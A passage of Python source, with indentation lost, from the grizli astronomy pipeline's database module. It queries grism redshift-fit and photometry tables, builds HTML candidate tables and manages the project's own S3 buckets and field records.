res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'red_bit', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND mag_auto < 24 AND flux_radius < 1.9 AND ((flux_radius < 1.5 AND flux_radius > 0.75 AND red_bit > 32) OR (flux_radius < 1.9 AND flux_radius > 1.0 AND red_bit < 32))", table_root='point_sources', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], get_sql=False)
# Reliable redshifts
res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', '(flux_radius < 1.7 AND ((flux_radius < 1.4 AND flux_radius > 0.75 AND red_bit > 32) OR (flux_radius < 1.7 AND flux_radius > 1.0 AND red_bit < 32)))::int as is_point', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'sn_siii', 'sn_ha', 'sn_oiii', 'sn_oii', 'ew50_ha', 'd4000', 'd4000_e', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND chinu < 30 AND q_z > -0.7 order by q_z", table_root='reliable_redshifts', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full'], get_sql=False, sort_column=('q_z', -1))
# stellar classification?
# sql = """SELECT root, id, ra, dec, status, z_map, q_z_map, bic_diff,
# bic_diff_star,
# chinu as t_chinu, s_chinu, q_chinu,
# chinu - q_chinu as tq_chinu, q_chinu - s_chinu as qs_chinu,
# chinu - s_chinu as ts_chinu, stellar_template
# FROM redshift_fit,
# (SELECT root as s_root, id as s_id, chinu as s_chinu, bic_diff_star,
# stellar_template
# FROM stellar_fit
# WHERE status = 6
# ) as s,
# (SELECT root as q_root, id as q_id, chinu as q_chinu,
# bic_diff as q_bic_diff, z_map as q_z_map
# FROM redshift_fit_quasar
# WHERE status = 6
# ) as q
# WHERE (root = s_root AND id = s_id) AND (root = q_root AND id = q_id)
# """
#res = grizli_db.make_html_table(engine=engine, res=cstar, table_root='carbon_stars', sync='s3://grizli-v1/tables/', png_ext=['stack','line', 'full', 'qso.full', 'star'], sort_column=('bic_diff_star', -1), get_sql=False)
sql = """SELECT root, id, status, ra, dec, t_g800l, t_g102, t_g141,
z_map, q_z_map, bic_diff,
bic_diff_star, (bic_diff_star > 10 AND q_chinu < 20 AND chinu - q_chinu > 0.05 AND q_chinu-s_chinu > 0 AND chinu-s_chinu > 0.1)::int as is_star,
chinu as t_chinu, s_chinu, q_chinu,
bic_qso-bic_gal as bic_gq,
bic_gal-bic_star as bic_gs,
bic_qso-bic_star as bic_qs,
(bic_spl+chimin)-bic_gal as bic_gx,
bic_spl_qso-bic_qso as bic_qx,
q_vel_bl, qso_q_z, qso_zw1, stellar_template
FROM (SELECT *, bic_temp+chimin as bic_gal FROM redshift_fit z,
(SELECT root as q_root, id as q_id, chinu as q_chinu,
bic_diff as q_bic_diff, bic_temp+chimin as bic_qso,
bic_spl+chimin as bic_spl_qso,
z_map as qso_z_map,
zwidth1/(1+z_map) as qso_zw1, vel_bl as q_vel_bl,
q_z as qso_q_z
FROM redshift_fit_quasar
WHERE status = 6
) q
WHERE (root = q_root AND id = q_id)) c
LEFT JOIN
(SELECT root as s_root, id as s_id, chinu as s_chinu,
LN(dof)*nk+chi2 as bic_star,
LN(dof)*(nk-1)+chi2_flat as bic_spline,
bic_diff_star,
stellar_template
FROM stellar_fit
WHERE status = 6
) s ON (root = s_root AND id = s_id) WHERE chinu-q_chinu > 0.5
"""
cstar = grizli_db.from_sql(sql, engine)
cstar['is_star'] = cstar['is_star'].filled(-1)
print('N={0}'.format(len(cstar)))
res = grizli_db.make_html_table(engine=engine, res=cstar, table_root='quasars_and_stars', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], sort_column=('bic_diff_star', -1), get_sql=False)
# best-fit as quasar
sql = """SELECT root, id, ra, dec, status, z_map, q_z_map,
q_z, bic_diff, q_bic_diff,
chinu as t_chinu, q_chinu,
chinu - q_chinu as tq_chinu,
(q_bic_temp + q_chimin) - (bic_temp + chimin) as bic_diff_quasar,
q_vel_bl
FROM redshift_fit z JOIN
(SELECT root as q_root, id as q_id, chinu as q_chinu,
bic_diff as q_bic_diff, z_map as q_z_map, vel_bl,
chimin as q_chimin, bic_temp as q_bic_temp, vel_bl as q_vel_bl
FROM redshift_fit_quasar
WHERE status = 6
) as q
WHERE (root = q_root AND id = q_id) AND status = 6 AND q_z > -1
"""
qq = grizli_db.from_sql(sql, engine)
res = grizli_db.make_html_table(engine=engine, res=qq, table_root='quasar_fit', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], get_sql=False)
# Strong lines
res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'red_bit', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', 'sn_ha', 'sn_oiii', 'sn_oii'], where="AND status > 4 AND mag_auto < 24 AND (sn_ha > 10 OR sn_oiii > 10 OR sn_oii > 10) AND flux_radius >= 1.6", table_root='strong_lines', sync='s3://grizli-v1/tables/', png_ext=['stack', 'full', 'qso.full', 'star'])
# brown dwarf?
tablename = 'spec1d_r30_g141'
wave = pd.read_sql_query("SELECT * from {0}_wave".format(tablename),
engine)[tablename+'_wave'].values
# 1.15, 1.25, 1.4
i0 = 25, 28, 29, 32
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', '{0}_flux[25]/{0}_flux[28] as c1'.format(tablename), '{0}_flux[32]/{0}_flux[28] as c2'.format(tablename)], where="AND status > 4 AND flux_radius < 2 AND flux_radius > 1 AND mag_auto < 25 AND {0}_root = root AND {0}_id = id AND {0}_flux[28] > 0 AND {0}_flux[28]/{0}_err[28] > 5 AND {0}_flux[32] > 0 AND {0}_flux[25] > 0 AND {0}_flux[32]/{0}_flux[28] < 0.5".format(tablename), tables=[tablename], table_root='point_sources_colors', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', '{0}_flux[25] as c25'.format(tablename), '{0}_flux[32] as c32'.format(tablename)], where="AND status > 4 AND z_spec = 0".format(tablename), tables=[tablename], table_root='point_sources_colors', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# with line ratios
lstr = 'err_{0} > 0 AND err_{0} < 5e-17'
err_lines = ' AND '.join(lstr.format(li) for li in
['hb', 'oiii', 'ha', 'sii'])
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'zwidth1/(1+z_map) as zw1', '(z_map-z_spec)/(1+z_spec) as dz', 'dlinesn', 'flux_hb/flux_ha as HbHa', 'flux_hb/flux_oiii as HbO3', 'flux_oiii/flux_ha as O3Ha'], where="AND status > 4 AND z_spec > 0 AND z_spec_qual = 1 AND sn_oiii > 3 AND sn_ha > 2 AND {0}".format(err_lines), table_root='zspec_lines', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
if False:
from matplotlib.ticker import FixedLocator, AutoLocator, MaxNLocator
import matplotlib.pyplot as plt
xti = xt = np.arange(0, 3.6, 0.5)
loc = np.arange(0, 3.6, 0.1)
bins = utils.log_zgrid([0.03, 3.5], 0.01)
fig = plt.figure(figsize=[7, 6])
ax = fig.add_subplot(111)
ax.scatter(np.log(1+res['z_spec']), np.log(1+res['z_map']), alpha=0.2, c=np.log10(res['zw1']), marker='.', vmin=-3.5, vmax=-0.5, cmap='plasma')
sc = ax.scatter(np.log([1]), np.log([1]), alpha=0.8, c=[0], marker='.', vmin=-3.5, vmax=-0.5, cmap='plasma')
cb = plt.colorbar(sc, shrink=0.6)
cb.set_label(r'$(z_{84}-z_{16})/(1+z_{50})$')
cb.set_ticks([-3, -2, -1])
cb.set_ticklabels([0.001, 0.01, 0.1])
xts = ax.set_xticks(np.log(1+xt))
xtl = ax.set_xticklabels(xti)
xts = ax.set_yticks(np.log(1+xt))
xtl = ax.set_yticklabels(xti)
ax.set_xlim(0, np.log(1+3.5))
ax.set_ylim(0, np.log(1+3.5))
ax.xaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
ax.yaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
ax.set_xlabel('z_spec')
ax.set_ylabel('z_MAP')
ax.set_aspect(1)
ax.grid()
ax.text(0.95, 0.05, r'$N={0}$'.format(len(res)), ha='right', va='bottom', transform=ax.transAxes)
ax.plot(ax.get_xlim(), ax.get_xlim(), color='k', alpha=0.2, linewidth=1, zorder=-10)
fig.tight_layout(pad=0.1)
fig.savefig('grizli_v1_literature_zspec.pdf')
# COSMOS test
root = 'cos-grism-j100012p0210'
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND bic_diff > 100 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
# high bic_diff = unambiguous
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e', '-(bic_temp-bic_spl) as bic_diff_spl'], where="AND status > 5 AND (((bic_diff > 50 OR zwidth1/(1+z_map) < 0.01) AND chinu < 2))", table_root='unamb', sync='s3://grizli-v1/tables/')
# with d4000
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e'], where="AND status > 5 AND chinu < 3 AND d4000 > 1 AND d4000 < 5 AND d4000_e > 0 AND d4000_e < 0.25 AND bic_diff > 5", table_root='d4000', sync='s3://grizli-v1/tables/')
# LBG?
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '-(bic_temp-bic_spl) as bic_diff_spl', 'splf01/splf02 as r12', 'splf02/splf03 as r23', 'splf02/sple02 as sn02'], where="AND status > 5 AND mag_auto > 23 AND bic_diff > -50 AND splf01/splf02 < 0.3 AND splf02/sple02 > 2 AND splf01 != 0 AND splf02 != 0 AND splf03 != 0 ".format(root), table_root='lbg_g800l', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# stars?
res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND bic_diff > 100 AND chinu < 1.5 AND mag_auto < 24 AND sn_Ha > 20", table_root='star', sync='s3://grizli-v1/tables/')
# By root
root = 'j001420m3030'
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND root = '{0}' AND bic_diff > 5".format(root), table_root=root+'-fit', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
# G800L spec-zs
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '(z_map-z_spec)/(1+z_spec) as delta_z'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND t_g800l > 0", table_root='zspec_g800l', sync='s3://grizli-v1/tables/')
# Large G800L likely mismatch [OIII]/Ha
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'ew50_oiii/(1+z_map) as ew_oiii_rest', 'sn_oiii'], where="AND status > 5 AND t_g800l > 0 AND sn_oiii > 3 AND mag_auto < 23 AND bic_diff > 5", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/')
# Potential Ly-a?
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'ew50_oiii/(1+z_map) as ew_oiii_rest', 'sn_oiii'], where="AND status > 5 AND t_g800l > 0 AND sn_oiii > 5 AND sn_ha > 0 AND flux_oiii/flux_ha > 1.8", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/')
# Continuum resid
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND bic_diff > 5 AND splf01 > 0 AND bic_diff > 50".format(root), table_root='xxx', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 as fresid', 'splf01/sple01 as sn01', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND t_g800l > 0 AND f814w_tot_1 > 0 AND splf01 != 0 AND splf01/sple01 > 1 AND f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 > 0 AND (f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 < 0.3 OR f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 > 4)", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])
sql = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'splf01', 'sple01', 'f814w_tot_1', 'f850lp_tot_1', 'flux_auto/flux_iso as flux_aper_corr', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND t_g800l > 0 AND splf01 > 0", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], get_sql=True)
res = pd.read_sql_query(sql, engine)
splmag = 23.9-2.5*np.log10(np.maximum(res['splf01'], 1.e-22)*8140**2/3.e18*1.e29)
sql = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'splf03', 'sple03', 'f140w_tot_1', 'f160w_tot_1', 'flux_auto/flux_iso as flux_aper_corr'], where="AND status > 5 AND t_g141 > 0 AND sple03 > 0", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], get_sql=True)
res = pd.read_sql_query(sql, engine)
splmag = 23.9-2.5*np.log10(np.maximum(res['splf03'], 1.e-22)*1.2e4**2/3.e18*1.e29)
# Number of matches per field
counts = pd.read_sql_query("select root, COUNT(root) as n from redshift_fit, photometry_apcorr where phot_root = p_root AND id = p_id AND bic_diff > 50 AND mag_auto < 24 group by root;", engine)
def from_sql(query, engine, **kwargs):
import pandas as pd
from grizli import utils
res = pd.read_sql_query(query, engine)
tab = utils.GTable.from_pandas(res)
set_column_formats(tab, **kwargs)
return tab
def render_for_notebook(tab, image_extensions=['stack', 'full', 'line'], bucket='grizli-v1', max_rows=20, link_root=True, link_type='grism'):
"""
Render images for inline display in a notebook
In [1]: from IPython.display import HTML
In [2]: HTML(tab)
"""
import pandas as pd
from eazy import utils as eu
pd.set_option('display.max_colwidth', -1)
rows = tab[:max_rows].copy()
buckets = [bucket]*len(rows)
for i, r in enumerate(rows['root']):
if r.startswith('cos-g'):
buckets[i] = 'grizli-cosmos-v2'
rows['bucket'] = buckets
rows['ext'] = 'longstring' # longer than the longest extension
s3url = 'https://s3.amazonaws.com/{bucket}/Pipeline/{root}/Extractions/{root}_{id:05d}.{ext}.png'
def href_root(root):
if root.startswith('cos-g'):
bucket_i = 'grizli-cosmos-v2'
else:
bucket_i = bucket
s3 = 'https://s3.amazonaws.com/'+bucket_i+'/Pipeline/{0}/Extractions/{0}.html'
return '<a href={0}>{1}</a>'.format(s3.format(root), root)
def path_to_image_html(path):
return '<a href={0}><img src="{0}"/></a>'.format(path)
# link for root
fmt = {}
cols = list(rows.colnames)
if link_root:
if link_type == 'grism':
fmt = {'root': href_root}
elif (link_type in ['cds','eso','alma','mast']) & ('ra' in cols):
funcs = {'cds':eu.cds_query,
'eso':eu.eso_query,
'alma':eu.alma_query,
'mast':eu.mast_query}
urls = [funcs[link_type](ra, dec)
for ra, dec in zip(tab['ra'], tab['dec'])]
href = [f'<a href="{u}"> {r} {i} </a>'
for u, r, i in zip(urls, tab['root'], tab['id'])]
rows['xroot'] = href
cols = ['xroot'] + cols
for c in ['root','id','ra','dec']:
cols.pop(cols.index(c))
for ext in image_extensions:
rows['ext'] = ext
urls = [s3url.format(**row) for row in rows.to_pandas().to_dict(orient='records')]
rows[ext] = urls
fmt[ext] = path_to_image_html
cols.append(ext)
rows.remove_columns(['bucket', 'ext'])
for c in ['bucket','ext']:
cols.pop(cols.index(c))
out = rows[cols].to_pandas().to_html(escape=False, formatters=fmt)
return out
def add_to_charge():
from grizli.aws import db
engine = db.get_db_engine()
p = db.from_sql('select distinct p_root from photometry_apcorr', engine)
f = db.from_sql('select distinct field_root from charge_fields', engine)
new_fields = []
for root in p['p_root']:
if root not in f['field_root']:
print(root)
new_fields.append(root)
df = pd.DataFrame()
df['field_root'] = new_fields
df['comment'] = 'CANDELS'
ix = df['field_root'] == 'j214224m4420'
df['comment'][ix] = 'Rafelski UltraDeep'
df.to_sql('charge_fields', engine, index=False, if_exists='append', method='multi')
def add_by_footprint(footprint_file='j141156p3415_footprint.fits', engine=None):
import pandas as pd
from grizli.aws import db
## By footprint
if engine is None:
engine = db.get_db_engine()
#ch = pd.read_sql_query('select * from charge_fields', engine)
f = pd.read_sql_query('select distinct field_root from charge_fields', engine)
fp = utils.read_catalog(footprint_file)
root = fp.meta['NAME']
if root in f['field_root'].tolist():
print(f'Field found: {root}')
return False
df = pd.DataFrame()
df['field_root'] = [root]
df['comment'] = 'manual'
df['field_xmin'] = fp.meta['XMIN']
df['field_xmax'] = fp.meta['XMAX']
df['field_ymin'] = fp.meta['YMIN']
df['field_ymax'] = fp.meta['YMAX']
df['field_ra'] = np.mean(fp['ra'])
df['field_dec'] = np.mean(fp['dec'])
df['mw_ebv'] = fp.meta['MW_EBV']
fp.rename_column('filter','filters')
for k in ['filters','target','proposal_id']:
df[k] = ' '.join([t for t in np.unique(fp[k])])
#df['proposal_id'] = ' '.join([t for t in np.unique(fp['target'])])
print(f'Send {root} to db.charge_fields')
df.to_sql('charge_fields', engine, index=False, if_exists='append', method='multi')
def update_charge_fields():
"""
"""
from grizli.aws import db
files = [f.replace('.png','.fits') for f in glob.glob('j*footprint.png')]
files.sort()
for file in files:
db.add_by_footprint(file, engine=engine)
orig = db.from_sql('select field_root, log from charge_fields', engine)
gtab = db.from_sql('select field_root, log from charge_fields', engine)
bucket = 'grizli-v1'
for st, dir in enumerate(['Start','Failed','Finished']):
print(dir)
os.system('aws s3 ls s3://{0}/Pipeline/Log/{1}/ | sed "s/.log//" > /tmp/{1}'.format(bucket, dir))
fin = utils.read_catalog(f'/tmp/{dir}', format='ascii')
print('{0} {1}'.format(dir, len(fin)))
for i, r in enumerate(fin['col4']):
ix = gtab['field_root'] == r
if ix.sum() > 0:
gtab['log'][ix] = '{0} {1}-{2}'.format(dir, fin['col1'][i], fin['col2'][i])
# update the table
df = gtab[~gtab['log'].mask].to_pandas()
df.to_sql('log_tmp', engine, index=False, if_exists='replace', method='multi')
sql = "UPDATE charge_fields ch SET log = tmp.log FROM log_tmp tmp WHERE tmp.field_root = ch.field_root"
engine.execute(sql)
def overview_table():
"""
Generate a new overview table with the redshift histograms
"""
from grizli.aws import db as grizli_db
import pandas as pd
from grizli import utils
engine = grizli_db.get_db_engine()
ch = from_sql("select * from charge_fields", engine)
by_mag = from_sql("select p_root as root, COUNT(p_root) as nmag from photometry_apcorr where mag_auto < 24 group by p_root;", engine)
by_nz = from_sql("select root, COUNT(root) as nz from redshift_fit where bic_diff > 30 group by root;", engine)
for count in [by_mag, by_nz]:
new_col = count.colnames[1]
ch[new_col] = -1
for r, n in zip(count['root'], count[new_col]):
ix = ch['field_root'] == r
ch[new_col][ix] = n
zhist = ['https://s3.amazonaws.com/grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png'.format(r) for r in ch['field_root']]
ch['zhist'] = ['<a href="{1}"><img src={0} height=300px></a>'.format(zh, zh.replace('_zhist.png', '.html')) for zh in zhist]
cols = ['field_root', 'field_ra', 'field_dec', 'mw_ebv', 'gaia5', 'nassoc', 'nfilt', 'filter', 'target', 'comment', 'proposal_id', 'proposal_pi', 'field_t_g800l', 'field_t_g102', 'field_t_g141', 'mast', 'footprint', 'rgb', 'nmag', 'nz', 'zhist', 'summary', 'log']
sortable = []
for c in cols:
if not hasattr(ch[c][0], 'upper'):
sortable.append(c)
# https://s3.amazonaws.com/grizli-v1/Master/CHArGE-July2019.html
table_root = 'CHArGE-July2019.zhist'
ch[cols].write_sortable_html('{0}.html'.format(table_root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=sortable, buttons=['csv'], toggle=True, use_json=True)
os.system('aws s3 sync ./ s3://grizli-v1/Master/ --exclude "*" --include "{1}.html" --include "{1}.json" --acl public-read'.format('', table_root))
def run_all_redshift_fits():
##############
# Run all
from grizli.aws import db as grizli_db
import pandas as pd
engine = grizli_db.get_db_engine()
# By grism
res = pd.read_sql_query("select field_root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where (nassoc < 200 AND (field_t_g800l > 0 OR field_t_g141 > 0 OR field_t_g102 > 0) AND log LIKE '%%inish%%');", engine)
orig_roots = pd.read_sql_query('select distinct root from redshift_fit', engine)['root'].tolist()
count = 0
for i, (root, ta, tb, tr, pi) in enumerate(zip(res['field_root'], res['field_t_g800l'], res['field_t_g102'], res['field_t_g141'], res['proposal_pi'])):
if root in orig_roots:
continue
count += 1
zmax = 1.6
if tb > 0:
zmax = 2.2
if tr > 0:
zmax = 3.2
print('\n\n', i, count, root, ta, tb, tr, pi, zmax, '\n\n')
phot_root = None
try:
grizli_db.run_lambda_fits(root, phot_root=phot_root,
min_status=6, zr=[0.01, zmax])
except:
pass
####
# Redo fits on reprocessed fields
# for i in range(2,11):
# root = 'j214224m4420gr{0:02d}'.format(i)
# print(root)
#
res = engine.execute("DELETE from redshift_fit WHERE (root = '{0}')".format(root), engine)
res = engine.execute("DELETE from redshift_fit_quasar WHERE (root = '{0}')".format(root), engine)
res = engine.execute("DELETE from stellar_fit WHERE (root = '{0}')".format(root), engine)
res = engine.execute("DELETE from photometry_apcorr WHERE (p_root = '{0}')".format(root), engine)
if False:
# Remove the whole thing
res = engine.execute("DELETE from exposure_log WHERE (parent = '{0}')".format(root), engine)
res = engine.execute("DELETE from charge_fields WHERE (field_root = '{0}')".format(root), engine)
grizli_db.run_lambda_fits(root, phot_root=root, min_status=2, zr=[0.01, zmax], mag_limits=[15, 26], engine=engine)
# for root in "j233844m5528 j105732p3620 j112416p1132 j113812m1134 j113848m1134 j122852p1046 j143200p0959 j152504p0423 j122056m0205 j122816m1132 j131452p2612".split():
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'q_z', 'q_z > -0.69 as q_z_TPR90', 'dlinesn'], where="AND status > 4 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'rgb', 'line'], show_hist=True)
grizli_db.aws_rgb_thumbnails(root, engine=engine)
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png s3://grizli-v1/tables/'.format(root))
def aws_rgb_thumbnails(root, bucket='grizli-v1', engine=None, thumb_args={}, ids=None, verbose=True, res=None):
"""
Make thumbnails for everything that has an entry in the redshift_fit table
"""
from grizli.aws import aws_drizzler, fit_redshift_lambda
if engine is None:
engine = get_db_engine(echo=False)
if res is None:
res = from_sql("SELECT root, id, ra, dec FROM redshift_fit WHERE root = '{0}' AND ra > 0".format(root), engine)
aws_prep_dir = 's3://{0}/Pipeline/{1}/Prep/'.format(bucket, root)
aws_bucket = 's3://{0}/Pipeline/{1}/Thumbnails/'.format(bucket, root)
event = {'make_segmentation_figure': True,
'aws_prep_dir': aws_prep_dir,
'single_output': True,
'combine_similar_filters': True,
'show_filters': ['visb', 'visr', 'y', 'j', 'h'],
'include_ir_psf': False,
'include_saturated': True,
'subtract_median': True,
'sync_fits': True,
'thumb_height': 2.0,
'scale_ab': 21,
'aws_bucket': aws_bucket,
'master': None,
'rgb_params': {'xsize': 4, 'output_dpi': None,
'rgb_min': -0.01, 'add_labels': False,
'output_format': 'png', 'show_ir': False,
'scl': 2, 'suffix': '.rgb', 'mask_empty': False,
'tick_interval': 1, 'pl': 1},
'remove': True,
'filters': ['f160w', 'f140w', 'f125w', 'f105w', 'f110w', 'f098m',
'f850lp', 'f814w', 'f775w', 'f606w', 'f475w',
'f555w', 'f600lp', 'f390w', 'f350lp'],
'half_optical_pixscale': True,
'theta': 0,
'kernel': 'square',
'pixfrac': 0.33,
'wcs': None,
'size': 6,
'pixscale': 0.1}
for k in thumb_args:
event[k] = thumb_args[k]
N = len(res)
for i in range(N):
id = res['id'][i]
ra = res['ra'][i]
dec = res['dec'][i]
root_i = res['root'][i]
if ids is not None:
if id not in ids:
continue
event['ra'] = ra
event['dec'] = dec
event['label'] = '{0}_{1:05d}'.format(root_i, id)
fit_redshift_lambda.send_event_lambda(event, verbose=verbose)
def count_sources_for_bad_persistence():
"""
Count the number of extracted objects for each id and look for fields
with few objects, which are usually problems with the persistence mask
"""
import pandas as pd
from grizli.aws import db as grizli_db
from grizli import utils
engine = grizli_db.get_db_engine(echo=False)
# Number of matches per field
counts = pd.read_sql_query("select root, COUNT(root) as n from redshift_fit, photometry_apcorr where phot_root = p_root AND id = p_id AND bic_diff > 5 AND mag_auto < 24 group by root;", engine)
counts = utils.GTable.from_pandas(counts)
so = np.argsort(counts['n'])
sh = """
BUCKET=grizli-v
root=j113812m1134
aws s3 rm --recursive s3://grizli-v1/Pipeline/${root}/ --include "*"
grism_run_single.sh ${root} --run_fine_alignment=True --extra_filters=g800l --bucket=grizli-v1 --preprocess_args.skip_single_optical_visits=True --mask_spikes=True --persistence_args.err_threshold=1
"""
def add_missing_photometry():
# Add missing photometry
import os
import pandas as pd
from grizli.aws import db as grizli_db
from grizli.pipeline import photoz
from grizli import utils
engine = grizli_db.get_db_engine(echo=False)
res = pd.read_sql_query("select distinct root from redshift_fit where root like 'j%%'", engine)['root'].tolist()
orig_roots = pd.read_sql_query('select distinct p_root as root from photometry_apcorr', engine)['root'].tolist()
# Missing grism fields?
res = pd.read_sql_query("select field_root as root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where (field_t_g800l > 0 OR field_t_g141 > 0 OR field_t_g102 > 0) AND log LIKE '%%inish%%';", engine)['root'].tolist()
orig_roots = pd.read_sql_query('select distinct root from redshift_fit', engine)['root'].tolist()
# All photometry
